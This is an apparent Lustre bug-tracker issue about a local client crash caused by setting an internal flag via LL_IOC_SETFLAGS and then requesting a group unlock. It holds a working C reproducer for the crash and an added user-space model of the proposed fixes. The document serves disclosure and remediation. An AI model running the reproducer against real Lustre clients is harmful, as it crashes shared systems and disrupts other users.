
client local DoS -- ASSERTION( fd->fd_grouplock.lg_lock != ((void *)0) ) failed after 'setflags'


    • Type: Bug
    • Resolution: Fixed
    • Priority: Minor
    • Lustre 2.16.0
    • Lustre 2.14.0

      Basically, from the moment anyone can do setflags, we shouldn't trust flags for anything that might crash the client.

      Not sure how much we care about lustre client local crash, but this should be a trivial fix (replace LBUG by some warning + return einval? I don't think we can restrict setflags to root-only, but even that would be dubious to me. Alternatively prevent setflags/clearflags from touching this particular bit?..)

      I found this by adding some lustre ioctl definitions to the trinity syscall fuzzer and letting it run for a (very short) bit; I bet there is other low-hanging fruit. I might set an intern on this (putting more lustre-specific stuff in trinity and reporting bugs) if you're interested.
      (And if you're not interested I can submit a patch around next month, no time right now and already got too distracted...)

      Reproducer:

      #include <linux/fs.h>
      #include <linux/types.h>
      #include <sys/ioctl.h>
      #include <sys/stat.h>
      #include <fcntl.h>
      #include <stdio.h>
      #include <linux/lustre/lustre_idl.h>
      
      /* Reproducer: set a file flag bit through LL_IOC_SETFLAGS, then ask for a
       * group unlock on a file that never took a group lock. */
      int main(int argc, char *argv[]) {
      	int fd;
      	long int flags = 0x2;
      	if (argc < 2) {
      		fprintf(stderr, "usage: %s <file on lustre>\n", argv[0]);
      		return 1;
      	}
      	/* O_CREAT requires a mode argument */
      	if ((fd = open(argv[1], O_CREAT|O_RDWR, 0644)) < 0)
      		return -1;
      	ioctl(fd, LL_IOC_SETFLAGS, &flags);
      	ioctl(fd, LL_IOC_GROUP_UNLOCK, NULL);
      	return 0;
      }
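The two mitigations the report sketches (refuse to let setflags/clearflags touch the internal bit, and replace the LBUG with a warning plus an error return) can be modelled in user space. The block below is an added example, not Lustre's code: the struct, function names, flag values and the choice of -EINVAL are assumptions made for illustration, with 0x2 mirroring the value the reproducer passes to LL_IOC_SETFLAGS.

```c
/* Added example (not Lustre's code): user-space model of hardened flag and
 * group-unlock handling. All names and bit values are assumptions. */
#include <errno.h>
#include <stdio.h>

#define FLAG_IGNORE_LOCK   0x1u  /* assumed: a bit user space may set */
#define FLAG_GROUP_LOCKED  0x2u  /* assumed: internal, set only by the lock path */

/* Only these bits may be changed through SETFLAGS/CLEARFLAGS. */
#define USER_SETTABLE_FLAGS FLAG_IGNORE_LOCK

/* Stand-in for per-open-file state (flags plus the group-lock object). */
struct file_state {
	unsigned int flags;
	int *grouplock;      /* NULL when no group lock object is attached */
};

/* Unhardened path: any bit, including internal ones, can be set. */
int legacy_setflags(struct file_state *st, unsigned int wanted)
{
	st->flags |= wanted;
	return 0;
}

/* Mitigation 1: refuse to let user space touch internal bits. */
int hardened_setflags(struct file_state *st, unsigned int wanted)
{
	if (wanted & ~USER_SETTABLE_FLAGS)
		return -EINVAL;
	st->flags |= wanted;
	return 0;
}

int hardened_clearflags(struct file_state *st, unsigned int wanted)
{
	if (wanted & ~USER_SETTABLE_FLAGS)
		return -EINVAL;
	st->flags &= ~wanted;
	return 0;
}

/* The lock path sets the internal bit and attaches the lock object together. */
int group_lock(struct file_state *st, int *lock_object)
{
	if (st->flags & FLAG_GROUP_LOCKED)
		return -EINVAL;             /* already locked */
	st->grouplock = lock_object;
	st->flags |= FLAG_GROUP_LOCKED;
	return 0;
}

/* Mitigation 2: state user input can influence is checked, not asserted.
 * Where the original LBUGs on a NULL lock object, this warns and fails. */
int group_unlock(struct file_state *st)
{
	if (!(st->flags & FLAG_GROUP_LOCKED))
		return -EINVAL;             /* nothing to unlock */
	if (st->grouplock == NULL) {
		fprintf(stderr, "warning: GROUP_LOCKED set without lock object\n");
		st->flags &= ~FLAG_GROUP_LOCKED;
		return -EINVAL;
	}
	st->grouplock = NULL;
	st->flags &= ~FLAG_GROUP_LOCKED;
	return 0;
}

/* The reporter's sequence against hardened setflags: the bit is rejected. */
int scenario_hardened_rejects_bit(void)
{
	struct file_state st = { 0, NULL };
	return hardened_setflags(&st, FLAG_GROUP_LOCKED);
}

/* Even if setflags still accepts the bit, unlock returns an error, no crash. */
int scenario_unlock_without_lock(void)
{
	struct file_state st = { 0, NULL };
	legacy_setflags(&st, FLAG_GROUP_LOCKED);
	return group_unlock(&st);
}

/* The legitimate lock/unlock pair still succeeds (returns 0). */
int scenario_lock_then_unlock(void)
{
	struct file_state st = { 0, NULL };
	int lock_object = 42;                  /* constructed stand-in */
	if (group_lock(&st, &lock_object) != 0)
		return -1;
	return group_unlock(&st);
}

int main(void)
{
	printf("hardened setflags on internal bit: %d\n", scenario_hardened_rejects_bit());
	printf("unlock after legacy setflags:      %d\n", scenario_unlock_without_lock());
	printf("lock then unlock:                  %d\n", scenario_lock_then_unlock());
	return 0;
}
```

The mask in hardened_setflags is the cheaper fix and the one the report leans toward; the check in group_unlock is the defence in depth that holds even if another path manages to set the bit without attaching a lock.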
      

            Assignee: Dominique Martinet (martinetd) (Inactive)
            Reporter: Dominique Martinet (martinetd) (Inactive)
            Votes: 0
            Watchers: 4
